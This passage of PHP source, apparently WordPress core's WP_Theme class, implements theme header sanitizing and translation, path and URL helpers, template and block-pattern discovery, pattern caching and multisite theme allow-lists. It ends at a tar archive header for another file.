$this->headers_sanitized[ $header ] = $this->sanitize_header( $header, $this->headers[ $header ] );
}
return $this->headers_sanitized[ $header ];
}
/**
* Gets a theme header, formatted and translated for display.
*
* @since 3.4.0
*
* @param string $header Theme header. Name, Description, Author, Version, ThemeURI, AuthorURI, Status, Tags.
* @param bool $markup Optional. Whether to mark up the header. Defaults to true.
* @param bool $translate Optional. Whether to translate the header. Defaults to true.
* @return string|array|false Processed header. An array for Tags if `$markup` is false, string otherwise.
* False on failure.
*/
public function display( $header, $markup = true, $translate = true ) {
$value = $this->get( $header );
if ( false === $value ) {
return false;
}
if ( $translate && ( empty( $value ) || ! $this->load_textdomain() ) ) {
$translate = false;
}
if ( $translate ) {
$value = $this->translate_header( $header, $value );
}
if ( $markup ) {
$value = $this->markup_header( $header, $value, $translate );
}
return $value;
}
/**
* Sanitizes a theme header.
*
* @since 3.4.0
* @since 5.4.0 Added support for `Requires at least` and `Requires PHP` headers.
* @since 6.1.0 Added support for `Update URI` header.
*
* @param string $header Theme header. Accepts 'Name', 'Description', 'Author', 'Version',
* 'ThemeURI', 'AuthorURI', 'Status', 'Tags', 'RequiresWP', 'RequiresPHP',
* 'UpdateURI'.
* @param string $value Value to sanitize.
* @return string|array An array for Tags header, string otherwise.
*/
private function sanitize_header( $header, $value ) {
switch ( $header ) {
case 'Status':
if ( ! $value ) {
$value = 'publish';
break;
}
// Fall through otherwise.
case 'Name':
static $header_tags = array(
'abbr' => array( 'title' => true ),
'acronym' => array( 'title' => true ),
'code' => true,
'em' => true,
'strong' => true,
);
$value = wp_kses( $value, $header_tags );
break;
case 'Author':
// There shouldn't be anchor tags in Author, but some themes like to be challenging.
case 'Description':
static $header_tags_with_a = array(
'a' => array(
'href' => true,
'title' => true,
),
'abbr' => array( 'title' => true ),
'acronym' => array( 'title' => true ),
'code' => true,
'em' => true,
'strong' => true,
);
$value = wp_kses( $value, $header_tags_with_a );
break;
case 'ThemeURI':
case 'AuthorURI':
$value = sanitize_url( $value );
break;
case 'Tags':
$value = array_filter( array_map( 'trim', explode( ',', strip_tags( $value ) ) ) );
break;
case 'Version':
case 'RequiresWP':
case 'RequiresPHP':
case 'UpdateURI':
$value = strip_tags( $value );
break;
}
return $value;
}
/**
* Marks up a theme header.
*
* @since 3.4.0
*
* @param string $header Theme header. Name, Description, Author, Version, ThemeURI, AuthorURI, Status, Tags.
* @param string|array $value Value to mark up. An array for Tags header, string otherwise.
* @param string $translate Whether the header has been translated.
* @return string Value, marked up.
*/
private function markup_header( $header, $value, $translate ) {
switch ( $header ) {
case 'Name':
if ( empty( $value ) ) {
$value = esc_html( $this->get_stylesheet() );
}
break;
case 'Description':
$value = wptexturize( $value );
break;
case 'Author':
if ( $this->get( 'AuthorURI' ) ) {
$value = sprintf( '<a href="%1$s">%2$s</a>', $this->display( 'AuthorURI', true, $translate ), $value );
} elseif ( ! $value ) {
$value = __( 'Anonymous' );
}
break;
case 'Tags':
static $comma = null;
if ( ! isset( $comma ) ) {
$comma = wp_get_list_item_separator();
}
$value = implode( $comma, $value );
break;
case 'ThemeURI':
case 'AuthorURI':
$value = esc_url( $value );
break;
}
return $value;
}
/**
* Translates a theme header.
*
* @since 3.4.0
*
* @param string $header Theme header. Name, Description, Author, Version, ThemeURI, AuthorURI, Status, Tags.
* @param string|array $value Value to translate. An array for Tags header, string otherwise.
* @return string|array Translated value. An array for Tags header, string otherwise.
*/
private function translate_header( $header, $value ) {
switch ( $header ) {
case 'Name':
// Cached for sorting reasons.
if ( isset( $this->name_translated ) ) {
return $this->name_translated;
}
// phpcs:ignore WordPress.WP.I18n.LowLevelTranslationFunction,WordPress.WP.I18n.NonSingularStringLiteralText,WordPress.WP.I18n.NonSingularStringLiteralDomain
$this->name_translated = translate( $value, $this->get( 'TextDomain' ) );
return $this->name_translated;
case 'Tags':
if ( empty( $value ) || ! function_exists( 'get_theme_feature_list' ) ) {
return $value;
}
static $tags_list;
if ( ! isset( $tags_list ) ) {
$tags_list = array(
// As of 4.6, deprecated tags which are only used to provide translation for older themes.
'black' => __( 'Black' ),
'blue' => __( 'Blue' ),
'brown' => __( 'Brown' ),
'gray' => __( 'Gray' ),
'green' => __( 'Green' ),
'orange' => __( 'Orange' ),
'pink' => __( 'Pink' ),
'purple' => __( 'Purple' ),
'red' => __( 'Red' ),
'silver' => __( 'Silver' ),
'tan' => __( 'Tan' ),
'white' => __( 'White' ),
'yellow' => __( 'Yellow' ),
'dark' => _x( 'Dark', 'color scheme' ),
'light' => _x( 'Light', 'color scheme' ),
'fixed-layout' => __( 'Fixed Layout' ),
'fluid-layout' => __( 'Fluid Layout' ),
'responsive-layout' => __( 'Responsive Layout' ),
'blavatar' => __( 'Blavatar' ),
'photoblogging' => __( 'Photoblogging' ),
'seasonal' => __( 'Seasonal' ),
);
$feature_list = get_theme_feature_list( false ); // No API.
foreach ( $feature_list as $tags ) {
$tags_list += $tags;
}
}
foreach ( $value as &$tag ) {
if ( isset( $tags_list[ $tag ] ) ) {
$tag = $tags_list[ $tag ];
} elseif ( isset( self::$tag_map[ $tag ] ) ) {
$tag = $tags_list[ self::$tag_map[ $tag ] ];
}
}
return $value;
default:
// phpcs:ignore WordPress.WP.I18n.LowLevelTranslationFunction,WordPress.WP.I18n.NonSingularStringLiteralText,WordPress.WP.I18n.NonSingularStringLiteralDomain
$value = translate( $value, $this->get( 'TextDomain' ) );
}
return $value;
}
/**
* Returns the directory name of the theme's "stylesheet" files, inside the theme root.
*
* In the case of a child theme, this is directory name of the child theme.
* Otherwise, get_stylesheet() is the same as get_template().
*
* @since 3.4.0
*
* @return string Stylesheet
*/
public function get_stylesheet() {
return $this->stylesheet;
}
/**
* Returns the directory name of the theme's "template" files, inside the theme root.
*
* In the case of a child theme, this is the directory name of the parent theme.
* Otherwise, the get_template() is the same as get_stylesheet().
*
* @since 3.4.0
*
* @return string Template
*/
public function get_template() {
return $this->template;
}
/**
* Returns the absolute path to the directory of a theme's "stylesheet" files.
*
* In the case of a child theme, this is the absolute path to the directory
* of the child theme's files.
*
* @since 3.4.0
*
* @return string Absolute path of the stylesheet directory.
*/
public function get_stylesheet_directory() {
if ( $this->errors() && in_array( 'theme_root_missing', $this->errors()->get_error_codes(), true ) ) {
return '';
}
return $this->theme_root . '/' . $this->stylesheet;
}
/**
* Returns the absolute path to the directory of a theme's "template" files.
*
* In the case of a child theme, this is the absolute path to the directory
* of the parent theme's files.
*
* @since 3.4.0
*
* @return string Absolute path of the template directory.
*/
public function get_template_directory() {
if ( $this->parent() ) {
$theme_root = $this->parent()->theme_root;
} else {
$theme_root = $this->theme_root;
}
return $theme_root . '/' . $this->template;
}
/**
* Returns the URL to the directory of a theme's "stylesheet" files.
*
* In the case of a child theme, this is the URL to the directory of the
* child theme's files.
*
* @since 3.4.0
*
* @return string URL to the stylesheet directory.
*/
public function get_stylesheet_directory_uri() {
return $this->get_theme_root_uri() . '/' . str_replace( '%2F', '/', rawurlencode( $this->stylesheet ) );
}
/**
* Returns the URL to the directory of a theme's "template" files.
*
* In the case of a child theme, this is the URL to the directory of the
* parent theme's files.
*
* @since 3.4.0
*
* @return string URL to the template directory.
*/
public function get_template_directory_uri() {
if ( $this->parent() ) {
$theme_root_uri = $this->parent()->get_theme_root_uri();
} else {
$theme_root_uri = $this->get_theme_root_uri();
}
return $theme_root_uri . '/' . str_replace( '%2F', '/', rawurlencode( $this->template ) );
}
/**
* Returns the absolute path to the directory of the theme root.
*
* This is typically the absolute path to wp-content/themes.
*
* @since 3.4.0
*
* @return string Theme root.
*/
public function get_theme_root() {
return $this->theme_root;
}
/**
* Returns the URL to the directory of the theme root.
*
* This is typically the absolute URL to wp-content/themes. This forms the basis
* for all other URLs returned by WP_Theme, so we pass it to the public function
* get_theme_root_uri() and allow it to run the {@see 'theme_root_uri'} filter.
*
* @since 3.4.0
*
* @return string Theme root URI.
*/
public function get_theme_root_uri() {
if ( ! isset( $this->theme_root_uri ) ) {
$this->theme_root_uri = get_theme_root_uri( $this->stylesheet, $this->theme_root );
}
return $this->theme_root_uri;
}
/**
* Returns the main screenshot file for the theme.
*
* The main screenshot is called screenshot.png. gif and jpg extensions are also allowed.
*
* Screenshots for a theme must be in the stylesheet directory. (In the case of child
* themes, parent theme screenshots are not inherited.)
*
* @since 3.4.0
*
* @param string $uri Type of URL to return, either 'relative' or an absolute URI. Defaults to absolute URI.
* @return string|false Screenshot file. False if the theme does not have a screenshot.
*/
public function get_screenshot( $uri = 'uri' ) {
$screenshot = $this->cache_get( 'screenshot' );
if ( $screenshot ) {
if ( 'relative' === $uri ) {
return $screenshot;
}
return $this->get_stylesheet_directory_uri() . '/' . $screenshot;
} elseif ( 0 === $screenshot ) {
return false;
}
foreach ( array( 'png', 'gif', 'jpg', 'jpeg', 'webp', 'avif' ) as $ext ) {
if ( file_exists( $this->get_stylesheet_directory() . "/screenshot.$ext" ) ) {
$this->cache_add( 'screenshot', 'screenshot.' . $ext );
if ( 'relative' === $uri ) {
return 'screenshot.' . $ext;
}
return $this->get_stylesheet_directory_uri() . '/' . 'screenshot.' . $ext;
}
}
$this->cache_add( 'screenshot', 0 );
return false;
}
/**
* Returns files in the theme's directory.
*
* @since 3.4.0
*
* @param string[]|string $type Optional. Array of extensions to find, string of a single extension,
* or null for all extensions. Default null.
* @param int $depth Optional. How deep to search for files. Defaults to a flat scan (0 depth).
* -1 depth is infinite.
* @param bool $search_parent Optional. Whether to return parent files. Default false.
* @return string[] Array of files, keyed by the path to the file relative to the theme's directory, with the values
* being absolute paths.
*/
public function get_files( $type = null, $depth = 0, $search_parent = false ) {
$files = (array) self::scandir( $this->get_stylesheet_directory(), $type, $depth );
if ( $search_parent && $this->parent() ) {
$files += (array) self::scandir( $this->get_template_directory(), $type, $depth );
}
return array_filter( $files );
}
/**
* Returns the theme's post templates.
*
* @since 4.7.0
* @since 5.8.0 Include block templates.
*
* @return array[] Array of page template arrays, keyed by post type and filename,
* with the value of the translated header name.
*/
public function get_post_templates() {
// If you screw up your active theme and we invalidate your parent, most things still work. Let it slide.
if ( $this->errors() && $this->errors()->get_error_codes() !== array( 'theme_parent_invalid' ) ) {
return array();
}
$post_templates = $this->cache_get( 'post_templates' );
if ( ! is_array( $post_templates ) ) {
$post_templates = array();
$files = (array) $this->get_files( 'php', 1, true );
foreach ( $files as $file => $full_path ) {
if ( ! preg_match( '|Template Name:(.*)$|mi', file_get_contents( $full_path ), $header ) ) {
continue;
}
$types = array( 'page' );
if ( preg_match( '|Template Post Type:(.*)$|mi', file_get_contents( $full_path ), $type ) ) {
$types = explode( ',', _cleanup_header_comment( $type[1] ) );
}
foreach ( $types as $type ) {
$type = sanitize_key( $type );
if ( ! isset( $post_templates[ $type ] ) ) {
$post_templates[ $type ] = array();
}
$post_templates[ $type ][ $file ] = _cleanup_header_comment( $header[1] );
}
}
$this->cache_add( 'post_templates', $post_templates );
}
if ( current_theme_supports( 'block-templates' ) ) {
$block_templates = get_block_templates( array(), 'wp_template' );
foreach ( get_post_types( array( 'public' => true ) ) as $type ) {
foreach ( $block_templates as $block_template ) {
if ( ! $block_template->is_custom ) {
continue;
}
if ( isset( $block_template->post_types ) && ! in_array( $type, $block_template->post_types, true ) ) {
continue;
}
$post_templates[ $type ][ $block_template->slug ] = $block_template->title;
}
}
}
if ( $this->load_textdomain() ) {
foreach ( $post_templates as &$post_type ) {
foreach ( $post_type as &$post_template ) {
$post_template = $this->translate_header( 'Template Name', $post_template );
}
}
}
return $post_templates;
}
/**
* Returns the theme's post templates for a given post type.
*
* @since 3.4.0
* @since 4.7.0 Added the `$post_type` parameter.
*
* @param WP_Post|null $post Optional. The post being edited, provided for context.
* @param string $post_type Optional. Post type to get the templates for. Default 'page'.
* If a post is provided, its post type is used.
* @return string[] Array of template header names keyed by the template file name.
*/
public function get_page_templates( $post = null, $post_type = 'page' ) {
if ( $post ) {
$post_type = get_post_type( $post );
}
$post_templates = $this->get_post_templates();
$post_templates = isset( $post_templates[ $post_type ] ) ? $post_templates[ $post_type ] : array();
/**
* Filters list of page templates for a theme.
*
* @since 4.9.6
*
* @param string[] $post_templates Array of template header names keyed by the template file name.
* @param WP_Theme $theme The theme object.
* @param WP_Post|null $post The post being edited, provided for context, or null.
* @param string $post_type Post type to get the templates for.
*/
$post_templates = (array) apply_filters( 'theme_templates', $post_templates, $this, $post, $post_type );
/**
* Filters list of page templates for a theme.
*
* The dynamic portion of the hook name, `$post_type`, refers to the post type.
*
* Possible hook names include:
*
* - `theme_post_templates`
* - `theme_page_templates`
* - `theme_attachment_templates`
*
* @since 3.9.0
* @since 4.4.0 Converted to allow complete control over the `$page_templates` array.
* @since 4.7.0 Added the `$post_type` parameter.
*
* @param string[] $post_templates Array of template header names keyed by the template file name.
* @param WP_Theme $theme The theme object.
* @param WP_Post|null $post The post being edited, provided for context, or null.
* @param string $post_type Post type to get the templates for.
*/
$post_templates = (array) apply_filters( "theme_{$post_type}_templates", $post_templates, $this, $post, $post_type );
return $post_templates;
}
/**
* Scans a directory for files of a certain extension.
*
* @since 3.4.0
*
* @param string $path Absolute path to search.
* @param array|string|null $extensions Optional. Array of extensions to find, string of a single extension,
* or null for all extensions. Default null.
* @param int $depth Optional. How many levels deep to search for files. Accepts 0, 1+, or
* -1 (infinite depth). Default 0.
* @param string $relative_path Optional. The basename of the absolute path. Used to control the
* returned path for the found files, particularly when this function
* recurses to lower depths. Default empty.
* @return string[]|false Array of files, keyed by the path to the file relative to the `$path` directory prepended
* with `$relative_path`, with the values being absolute paths. False otherwise.
*/
private static function scandir( $path, $extensions = null, $depth = 0, $relative_path = '' ) {
if ( ! is_dir( $path ) ) {
return false;
}
if ( $extensions ) {
$extensions = (array) $extensions;
$_extensions = implode( '|', $extensions );
}
$relative_path = trailingslashit( $relative_path );
if ( '/' === $relative_path ) {
$relative_path = '';
}
$results = scandir( $path );
$files = array();
/**
* Filters the array of excluded directories and files while scanning theme folder.
*
* @since 4.7.4
*
* @param string[] $exclusions Array of excluded directories and files.
*/
$exclusions = (array) apply_filters( 'theme_scandir_exclusions', array( 'CVS', 'node_modules', 'vendor', 'bower_components' ) );
foreach ( $results as $result ) {
if ( '.' === $result[0] || in_array( $result, $exclusions, true ) ) {
continue;
}
if ( is_dir( $path . '/' . $result ) ) {
if ( ! $depth ) {
continue;
}
$found = self::scandir( $path . '/' . $result, $extensions, $depth - 1, $relative_path . $result );
$files = array_merge_recursive( $files, $found );
} elseif ( ! $extensions || preg_match( '~\.(' . $_extensions . ')$~', $result ) ) {
$files[ $relative_path . $result ] = $path . '/' . $result;
}
}
return $files;
}
/**
* Loads the theme's textdomain.
*
* Translation files are not inherited from the parent theme. TODO: If this fails for the
* child theme, it should probably try to load the parent theme's translations.
*
* @since 3.4.0
*
* @return bool True if the textdomain was successfully loaded or has already been loaded.
* False if no textdomain was specified in the file headers, or if the domain could not be loaded.
*/
public function load_textdomain() {
if ( isset( $this->textdomain_loaded ) ) {
return $this->textdomain_loaded;
}
$textdomain = $this->get( 'TextDomain' );
if ( ! $textdomain ) {
$this->textdomain_loaded = false;
return false;
}
if ( is_textdomain_loaded( $textdomain ) ) {
$this->textdomain_loaded = true;
return true;
}
$path = $this->get_stylesheet_directory();
$domainpath = $this->get( 'DomainPath' );
if ( $domainpath ) {
$path .= $domainpath;
} else {
$path .= '/languages';
}
$this->textdomain_loaded = load_theme_textdomain( $textdomain, $path );
return $this->textdomain_loaded;
}
/**
* Determines whether the theme is allowed (multisite only).
*
* @since 3.4.0
*
* @param string $check Optional. Whether to check only the 'network'-wide settings, the 'site'
* settings, or 'both'. Defaults to 'both'.
* @param int $blog_id Optional. Ignored if only network-wide settings are checked. Defaults to current site.
* @return bool Whether the theme is allowed for the network. Returns true in single-site.
*/
public function is_allowed( $check = 'both', $blog_id = null ) {
if ( ! is_multisite() ) {
return true;
}
if ( 'both' === $check || 'network' === $check ) {
$allowed = self::get_allowed_on_network();
if ( ! empty( $allowed[ $this->get_stylesheet() ] ) ) {
return true;
}
}
if ( 'both' === $check || 'site' === $check ) {
$allowed = self::get_allowed_on_site( $blog_id );
if ( ! empty( $allowed[ $this->get_stylesheet() ] ) ) {
return true;
}
}
return false;
}
/**
* Returns whether this theme is a block-based theme or not.
*
* @since 5.9.0
*
* @return bool
*/
public function is_block_theme() {
if ( isset( $this->block_theme ) ) {
return $this->block_theme;
}
$paths_to_index_block_template = array(
$this->get_file_path( '/templates/index.html' ),
$this->get_file_path( '/block-templates/index.html' ),
);
$this->block_theme = false;
foreach ( $paths_to_index_block_template as $path_to_index_block_template ) {
if ( is_file( $path_to_index_block_template ) && is_readable( $path_to_index_block_template ) ) {
$this->block_theme = true;
break;
}
}
return $this->block_theme;
}
/**
* Retrieves the path of a file in the theme.
*
* Searches in the stylesheet directory before the template directory so themes
* which inherit from a parent theme can just override one file.
*
* @since 5.9.0
*
* @param string $file Optional. File to search for in the stylesheet directory.
* @return string The path of the file.
*/
public function get_file_path( $file = '' ) {
$file = ltrim( $file, '/' );
$stylesheet_directory = $this->get_stylesheet_directory();
$template_directory = $this->get_template_directory();
if ( empty( $file ) ) {
$path = $stylesheet_directory;
} elseif ( $stylesheet_directory !== $template_directory && file_exists( $stylesheet_directory . '/' . $file ) ) {
$path = $stylesheet_directory . '/' . $file;
} else {
$path = $template_directory . '/' . $file;
}
/** This filter is documented in wp-includes/link-template.php */
return apply_filters( 'theme_file_path', $path, $file );
}
/**
* Determines the latest WordPress default theme that is installed.
*
* This hits the filesystem.
*
* @since 4.4.0
*
* @return WP_Theme|false Object, or false if no theme is installed, which would be bad.
*/
public static function get_core_default_theme() {
foreach ( array_reverse( self::$default_themes ) as $slug => $name ) {
$theme = wp_get_theme( $slug );
if ( $theme->exists() ) {
return $theme;
}
}
return false;
}
/**
* Returns array of stylesheet names of themes allowed on the site or network.
*
* @since 3.4.0
*
* @param int $blog_id Optional. ID of the site. Defaults to the current site.
* @return string[] Array of stylesheet names.
*/
public static function get_allowed( $blog_id = null ) {
/**
* Filters the array of themes allowed on the network.
*
* Site is provided as context so that a list of network allowed themes can
* be filtered further.
*
* @since 4.5.0
*
* @param string[] $allowed_themes An array of theme stylesheet names.
* @param int $blog_id ID of the site.
*/
$network = (array) apply_filters( 'network_allowed_themes', self::get_allowed_on_network(), $blog_id );
return $network + self::get_allowed_on_site( $blog_id );
}
/**
* Returns array of stylesheet names of themes allowed on the network.
*
* @since 3.4.0
*
* @return string[] Array of stylesheet names.
*/
public static function get_allowed_on_network() {
static $allowed_themes;
if ( ! isset( $allowed_themes ) ) {
$allowed_themes = (array) get_site_option( 'allowedthemes' );
}
/**
* Filters the array of themes allowed on the network.
*
* @since MU (3.0.0)
*
* @param string[] $allowed_themes An array of theme stylesheet names.
*/
$allowed_themes = apply_filters( 'allowed_themes', $allowed_themes );
return $allowed_themes;
}
/**
* Returns array of stylesheet names of themes allowed on the site.
*
* @since 3.4.0
*
* @param int $blog_id Optional. ID of the site. Defaults to the current site.
* @return string[] Array of stylesheet names.
*/
public static function get_allowed_on_site( $blog_id = null ) {
static $allowed_themes = array();
if ( ! $blog_id || ! is_multisite() ) {
$blog_id = get_current_blog_id();
}
if ( isset( $allowed_themes[ $blog_id ] ) ) {
/**
* Filters the array of themes allowed on the site.
*
* @since 4.5.0
*
* @param string[] $allowed_themes An array of theme stylesheet names.
* @param int $blog_id ID of the site. Defaults to current site.
*/
return (array) apply_filters( 'site_allowed_themes', $allowed_themes[ $blog_id ], $blog_id );
}
$current = get_current_blog_id() === $blog_id;
if ( $current ) {
$allowed_themes[ $blog_id ] = get_option( 'allowedthemes' );
} else {
switch_to_blog( $blog_id );
$allowed_themes[ $blog_id ] = get_option( 'allowedthemes' );
restore_current_blog();
}
/*
* This is all super old MU back compat joy.
* 'allowedthemes' keys things by stylesheet. 'allowed_themes' keyed things by name.
*/
if ( false === $allowed_themes[ $blog_id ] ) {
if ( $current ) {
$allowed_themes[ $blog_id ] = get_option( 'allowed_themes' );
} else {
switch_to_blog( $blog_id );
$allowed_themes[ $blog_id ] = get_option( 'allowed_themes' );
restore_current_blog();
}
if ( ! is_array( $allowed_themes[ $blog_id ] ) || empty( $allowed_themes[ $blog_id ] ) ) {
$allowed_themes[ $blog_id ] = array();
} else {
$converted = array();
$themes = wp_get_themes();
foreach ( $themes as $stylesheet => $theme_data ) {
if ( isset( $allowed_themes[ $blog_id ][ $theme_data->get( 'Name' ) ] ) ) {
$converted[ $stylesheet ] = true;
}
}
$allowed_themes[ $blog_id ] = $converted;
}
// Set the option so we never have to go through this pain again.
if ( is_admin() && $allowed_themes[ $blog_id ] ) {
if ( $current ) {
update_option( 'allowedthemes', $allowed_themes[ $blog_id ], false );
delete_option( 'allowed_themes' );
} else {
switch_to_blog( $blog_id );
update_option( 'allowedthemes', $allowed_themes[ $blog_id ], false );
delete_option( 'allowed_themes' );
restore_current_blog();
}
}
}
/** This filter is documented in wp-includes/class-wp-theme.php */
return (array) apply_filters( 'site_allowed_themes', $allowed_themes[ $blog_id ], $blog_id );
}
/**
* Returns the folder names of the block template directories.
*
* @since 6.4.0
*
* @return string[] {
* Folder names used by block themes.
*
* @type string $wp_template Theme-relative directory name for block templates.
* @type string $wp_template_part Theme-relative directory name for block template parts.
* }
*/
public function get_block_template_folders() {
// Return set/cached value if available.
if ( isset( $this->block_template_folders ) ) {
return $this->block_template_folders;
}
$this->block_template_folders = $this->default_template_folders;
$stylesheet_directory = $this->get_stylesheet_directory();
// If the theme uses deprecated block template folders.
if ( file_exists( $stylesheet_directory . '/block-templates' ) || file_exists( $stylesheet_directory . '/block-template-parts' ) ) {
$this->block_template_folders = array(
'wp_template' => 'block-templates',
'wp_template_part' => 'block-template-parts',
);
}
return $this->block_template_folders;
}
/**
* Gets block pattern data for a specified theme.
* Each pattern is defined as a PHP file and defines
* its metadata using plugin-style headers. The minimum required definition is:
*
* /**
* * Title: My Pattern
* * Slug: my-theme/my-pattern
* *
*
* The output of the PHP source corresponds to the content of the pattern, e.g.:
*
* <main><p><?php echo "Hello"; ?></p></main>
*
* If applicable, this will collect from both parent and child theme.
*
* Other settable fields include:
*
* - Description
* - Viewport Width
* - Inserter (yes/no)
* - Categories (comma-separated values)
* - Keywords (comma-separated values)
* - Block Types (comma-separated values)
* - Post Types (comma-separated values)
* - Template Types (comma-separated values)
*
* @since 6.4.0
*
* @return array Block pattern data.
*/
public function get_block_patterns() {
$can_use_cached = ! wp_is_development_mode( 'theme' );
$pattern_data = $this->get_pattern_cache();
if ( is_array( $pattern_data ) ) {
if ( $can_use_cached ) {
return $pattern_data;
}
// If in development mode, clear pattern cache.
$this->delete_pattern_cache();
}
$dirpath = $this->get_stylesheet_directory() . '/patterns';
$pattern_data = array();
if ( ! file_exists( $dirpath ) ) {
if ( $can_use_cached ) {
$this->set_pattern_cache( $pattern_data );
}
return $pattern_data;
}
$files = (array) self::scandir( $dirpath, 'php', -1 );
/**
* Filters list of block pattern files for a theme.
*
* @since 6.8.0
*
* @param array $files Array of theme files found within `patterns` directory.
* @param string $dirpath Path of theme `patterns` directory being scanned.
*/
$files = apply_filters( 'theme_block_pattern_files', $files, $dirpath );
$dirpath = trailingslashit( $dirpath );
if ( ! $files ) {
if ( $can_use_cached ) {
$this->set_pattern_cache( $pattern_data );
}
return $pattern_data;
}
$default_headers = array(
'title' => 'Title',
'slug' => 'Slug',
'description' => 'Description',
'viewportWidth' => 'Viewport Width',
'inserter' => 'Inserter',
'categories' => 'Categories',
'keywords' => 'Keywords',
'blockTypes' => 'Block Types',
'postTypes' => 'Post Types',
'templateTypes' => 'Template Types',
);
$properties_to_parse = array(
'categories',
'keywords',
'blockTypes',
'postTypes',
'templateTypes',
);
foreach ( $files as $file ) {
$pattern = get_file_data( $file, $default_headers );
if ( empty( $pattern['slug'] ) ) {
_doing_it_wrong(
__FUNCTION__,
sprintf(
/* translators: 1: file name. */
__( 'Could not register file "%s" as a block pattern ("Slug" field missing)' ),
$file
),
'6.0.0'
);
continue;
}
if ( ! preg_match( '/^[A-z0-9\/_-]+$/', $pattern['slug'] ) ) {
_doing_it_wrong(
__FUNCTION__,
sprintf(
/* translators: 1: file name; 2: slug value found. */
__( 'Could not register file "%1$s" as a block pattern (invalid slug "%2$s")' ),
$file,
$pattern['slug']
),
'6.0.0'
);
}
// Title is a required property.
if ( ! $pattern['title'] ) {
_doing_it_wrong(
__FUNCTION__,
sprintf(
/* translators: 1: file name. */
__( 'Could not register file "%s" as a block pattern ("Title" field missing)' ),
$file
),
'6.0.0'
);
continue;
}
// For properties of type array, parse data as comma-separated.
foreach ( $properties_to_parse as $property ) {
if ( ! empty( $pattern[ $property ] ) ) {
$pattern[ $property ] = array_filter( wp_parse_list( (string) $pattern[ $property ] ) );
} else {
unset( $pattern[ $property ] );
}
}
// Parse properties of type int.
$property = 'viewportWidth';
if ( ! empty( $pattern[ $property ] ) ) {
$pattern[ $property ] = (int) $pattern[ $property ];
} else {
unset( $pattern[ $property ] );
}
// Parse properties of type bool.
$property = 'inserter';
if ( ! empty( $pattern[ $property ] ) ) {
$pattern[ $property ] = in_array(
strtolower( $pattern[ $property ] ),
array( 'yes', 'true' ),
true
);
} else {
unset( $pattern[ $property ] );
}
$key = str_replace( $dirpath, '', $file );
$pattern_data[ $key ] = $pattern;
}
if ( $can_use_cached ) {
$this->set_pattern_cache( $pattern_data );
}
return $pattern_data;
}
/**
* Gets block pattern cache.
*
* @since 6.4.0
* @since 6.6.0 Uses transients to cache regardless of site environment.
*
* @return array|false Returns an array of patterns if cache is found, otherwise false.
*/
private function get_pattern_cache() {
if ( ! $this->exists() ) {
return false;
}
$pattern_data = get_site_transient( 'wp_theme_files_patterns-' . $this->cache_hash );
if ( is_array( $pattern_data ) && $pattern_data['version'] === $this->get( 'Version' ) ) {
return $pattern_data['patterns'];
}
return false;
}
/**
* Sets block pattern cache.
*
* @since 6.4.0
* @since 6.6.0 Uses transients to cache regardless of site environment.
*
* @param array $patterns Block patterns data to set in cache.
*/
private function set_pattern_cache( array $patterns ) {
$pattern_data = array(
'version' => $this->get( 'Version' ),
'patterns' => $patterns,
);
/**
* Filters the cache expiration time for theme files.
*
* @since 6.6.0
*
* @param int $cache_expiration Cache expiration time in seconds.
* @param string $cache_type Type of cache being set.
*/
$cache_expiration = (int) apply_filters( 'wp_theme_files_cache_ttl', self::$cache_expiration, 'theme_block_patterns' );
// We don't want to cache patterns infinitely.
if ( $cache_expiration <= 0 ) {
_doing_it_wrong(
__METHOD__,
sprintf(
/* translators: %1$s: The filter name.*/
__( 'The %1$s filter must return an integer value greater than 0.' ),
'<code>wp_theme_files_cache_ttl</code>'
),
'6.6.0'
);
$cache_expiration = self::$cache_expiration;
}
set_site_transient( 'wp_theme_files_patterns-' . $this->cache_hash, $pattern_data, $cache_expiration );
}
/**
* Clears block pattern cache.
*
* @since 6.4.0
* @since 6.6.0 Uses transients to cache regardless of site environment.
*/
public function delete_pattern_cache() {
delete_site_transient( 'wp_theme_files_patterns-' . $this->cache_hash );
}
/**
* Enables a theme for all sites on the current network.
*
* @since 4.6.0
*
* @param string|string[] $stylesheets Stylesheet name or array of stylesheet names.
*/
public static function network_enable_theme( $stylesheets ) {
if ( ! is_multisite() ) {
return;
}
if ( ! is_array( $stylesheets ) ) {
$stylesheets = array( $stylesheets );
}
$allowed_themes = get_site_option( 'allowedthemes' );
foreach ( $stylesheets as $stylesheet ) {
$allowed_themes[ $stylesheet ] = true;
}
update_site_option( 'allowedthemes', $allowed_themes );
}
/**
* Disables a theme for all sites on the current network.
*
* @since 4.6.0
*
* @param string|string[] $stylesheets Stylesheet name or array of stylesheet names.
*/
public static function network_disable_theme( $stylesheets ) {
if ( ! is_multisite() ) {
return;
}
if ( ! is_array( $stylesheets ) ) {
$stylesheets = array( $stylesheets );
}
$allowed_themes = get_site_option( 'allowedthemes' );
foreach ( $stylesheets as $stylesheet ) {
if ( isset( $allowed_themes[ $stylesheet ] ) ) {
unset( $allowed_themes[ $stylesheet ] );
}
}
update_site_option( 'allowedthemes', $allowed_themes );
}
/**
* Sorts themes by name.
*
* @since 3.4.0
*
* @param WP_Theme[] $themes Array of theme objects to sort (passed by reference).
*/
public static function sort_by_name( &$themes ) {
if ( str_starts_with( get_user_locale(), 'en_' ) ) {
uasort( $themes, array( 'WP_Theme', '_name_sort' ) );
} else {
foreach ( $themes as $key => $theme ) {
$theme->translate_header( 'Name', $theme->headers['Name'] );
}
uasort( $themes, array( 'WP_Theme', '_name_sort_i18n' ) );
}
}
/**
* Callback function for usort() to naturally sort themes by name.
*
* Accesses the Name header directly from the class for maximum speed.
* Would choke on HTML but we don't care enough to slow it down with strip_tags().
*
* @since 3.4.0
*
* @param WP_Theme $a First theme.
* @param WP_Theme $b Second theme.
* @return int Negative if `$a` falls lower in the natural order than `$b`. Zero if they fall equally.
* Greater than 0 if `$a` falls higher in the natural order than `$b`. Used with usort().
*/
private static function _name_sort( $a, $b ) {
return strnatcasecmp( $a->headers['Name'], $b->headers['Name'] );
}
/**
* Callback function for usort() to naturally sort themes by translated name.
*
* @since 3.4.0
*
* @param WP_Theme $a First theme.
* @param WP_Theme $b Second theme.
* @return int Negative if `$a` falls lower in the natural order than `$b`. Zero if they fall equally.
* Greater than 0 if `$a` falls higher in the natural order than `$b`. Used with usort().
*/
private static function _name_sort_i18n( $a, $b ) {
return strnatcasecmp( $a->name_translated, $b->name_translated );
}
private static function _check_headers_property_has_correct_type( $headers ) {
if ( ! is_array( $headers ) ) {
return false;
}
foreach ( $headers as $key => $value ) {
if ( ! is_string( $key ) || ! is_string( $value ) ) {
return false;
}
}
return true;
}
}
theme-previews-20260621133734.php 0000666 00000005536 15224151221 0011616 0 ustar 00 <?php
/**
